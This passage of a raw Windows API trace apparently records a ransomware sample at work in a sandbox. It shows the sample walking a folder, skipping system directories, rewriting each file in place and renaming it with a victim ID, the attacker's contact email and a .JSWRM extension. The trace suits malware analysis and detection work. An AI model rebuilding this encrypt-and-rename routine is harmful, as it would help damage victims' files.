hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0088.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0088.003] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec9380a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec9380a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa783, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0216112.JPG", cAlternateFileName="")) returned 1 [0088.003] lstrcmpiW (lpString1="J0216112.JPG", lpString2=".") returned 1 [0088.003] lstrcmpiW (lpString1="J0216112.JPG", lpString2="..") returned 1 [0088.003] lstrcmpiW (lpString1="J0216112.JPG", lpString2="...") returned 1 [0088.003] lstrcmpiW (lpString1="J0216112.JPG", lpString2="windows") returned -1 [0088.003] lstrcmpiW (lpString1="J0216112.JPG", lpString2="recovery") returned -1 [0088.003] lstrcmpiW (lpString1="J0216112.JPG", lpString2="perflogs") returned -1 [0088.003] lstrcmpiW (lpString1="J0216112.JPG", lpString2="documents and settings") returned 1 [0088.003] lstrcmpiW (lpString1="J0216112.JPG", lpString2="$RECYCLE.BIN") returned 1 [0088.003] lstrcmpiW (lpString1="J0216112.JPG", lpString2="system volume information") returned -1 [0088.003] lstrcmpiW (lpString1="J0216112.JPG", lpString2="msocache") returned -1 [0088.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0088.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216112.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216112.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0216112.JPG", lpUsedDefaultChar=0x0) returned 12 [0088.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0088.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0088.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216112.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216112.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0216112.JPG", lpUsedDefaultChar=0x0) returned 12 [0088.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0088.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0088.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0088.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0088.004] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216112.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216112.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.004] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=42883) returned 1 [0088.004] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa780) returned 0x24d210 [0088.004] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xa780, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xa780, lpOverlapped=0x0) returned 1 [0088.008] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.008] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xa780, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xa780, lpOverlapped=0x0) returned 1 [0088.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.009] CloseHandle (hObject=0x314) returned 1 [0088.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0088.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0088.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0088.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0088.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0088.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0088.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.010] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216112.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216112.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216112.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216112.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0088.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0088.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0088.011] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec9380a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec9380a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec9380a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5474, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0216153.JPG", cAlternateFileName="")) returned 1 [0088.011] lstrcmpiW (lpString1="J0216153.JPG", lpString2=".") returned 1 [0088.011] lstrcmpiW (lpString1="J0216153.JPG", lpString2="..") returned 1 [0088.011] lstrcmpiW (lpString1="J0216153.JPG", lpString2="...") returned 1 [0088.011] lstrcmpiW (lpString1="J0216153.JPG", lpString2="windows") returned -1 [0088.011] lstrcmpiW (lpString1="J0216153.JPG", lpString2="recovery") returned -1 [0088.011] lstrcmpiW (lpString1="J0216153.JPG", lpString2="perflogs") returned -1 [0088.011] lstrcmpiW (lpString1="J0216153.JPG", lpString2="documents and settings") returned 1 [0088.011] lstrcmpiW (lpString1="J0216153.JPG", lpString2="$RECYCLE.BIN") returned 1 [0088.011] lstrcmpiW (lpString1="J0216153.JPG", lpString2="system volume information") returned -1 [0088.011] lstrcmpiW (lpString1="J0216153.JPG", lpString2="msocache") returned -1 [0088.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0088.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216153.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216153.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0216153.JPG", lpUsedDefaultChar=0x0) returned 12 [0088.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0088.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216153.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216153.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0216153.JPG", lpUsedDefaultChar=0x0) returned 12 [0088.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0088.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0088.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0088.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0088.011] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216153.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216153.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.012] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=21620) returned 1 [0088.012] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5470) returned 0x24d210 [0088.012] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5470, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5470, lpOverlapped=0x0) returned 1 [0088.020] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.020] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5470, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5470, lpOverlapped=0x0) returned 1 [0088.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.021] CloseHandle (hObject=0x314) returned 1 [0088.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0088.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0088.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0088.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0088.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0088.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0088.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.021] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216153.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216153.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216153.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216153.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0088.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0088.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0088.022] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec9380a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec9380a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa488, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0216540.WMF", cAlternateFileName="")) returned 1 [0088.022] lstrcmpiW (lpString1="J0216540.WMF", lpString2=".") returned 1 [0088.022] lstrcmpiW (lpString1="J0216540.WMF", lpString2="..") returned 1 [0088.022] lstrcmpiW (lpString1="J0216540.WMF", lpString2="...") returned 1 [0088.022] lstrcmpiW (lpString1="J0216540.WMF", lpString2="windows") returned -1 [0088.022] lstrcmpiW (lpString1="J0216540.WMF", lpString2="recovery") returned -1 [0088.022] lstrcmpiW (lpString1="J0216540.WMF", lpString2="perflogs") returned -1 [0088.022] lstrcmpiW (lpString1="J0216540.WMF", lpString2="documents and settings") returned 1 [0088.022] lstrcmpiW (lpString1="J0216540.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.022] lstrcmpiW (lpString1="J0216540.WMF", lpString2="system volume information") returned -1 [0088.022] lstrcmpiW (lpString1="J0216540.WMF", lpString2="msocache") returned -1 [0088.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0088.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216540.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216540.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0216540.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0088.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0088.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216540.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216540.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0216540.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0088.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0088.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0088.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0088.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216540.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216540.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.050] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=42120) returned 1 [0088.050] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa480) returned 0x24d210 [0088.050] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xa480, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xa480, lpOverlapped=0x0) returned 1 [0088.054] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.055] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xa480, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xa480, lpOverlapped=0x0) returned 1 [0088.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.056] CloseHandle (hObject=0x314) returned 1 [0088.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0088.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0088.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0088.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0088.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0088.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0088.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.056] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216540.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216540.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216540.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216540.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0088.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0088.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0088.057] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec9380a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec9380a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec9380a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x60dc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0216570.WMF", cAlternateFileName="")) returned 1 [0088.057] lstrcmpiW (lpString1="J0216570.WMF", lpString2=".") returned 1 [0088.057] lstrcmpiW (lpString1="J0216570.WMF", lpString2="..") returned 1 [0088.057] lstrcmpiW (lpString1="J0216570.WMF", lpString2="...") returned 1 [0088.057] lstrcmpiW (lpString1="J0216570.WMF", lpString2="windows") returned -1 [0088.057] lstrcmpiW (lpString1="J0216570.WMF", lpString2="recovery") returned -1 [0088.057] lstrcmpiW (lpString1="J0216570.WMF", lpString2="perflogs") returned -1 [0088.057] lstrcmpiW (lpString1="J0216570.WMF", lpString2="documents and settings") returned 1 [0088.057] lstrcmpiW (lpString1="J0216570.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.057] lstrcmpiW (lpString1="J0216570.WMF", lpString2="system volume information") returned -1 [0088.057] lstrcmpiW (lpString1="J0216570.WMF", lpString2="msocache") returned -1 [0088.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216570.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216570.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0216570.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 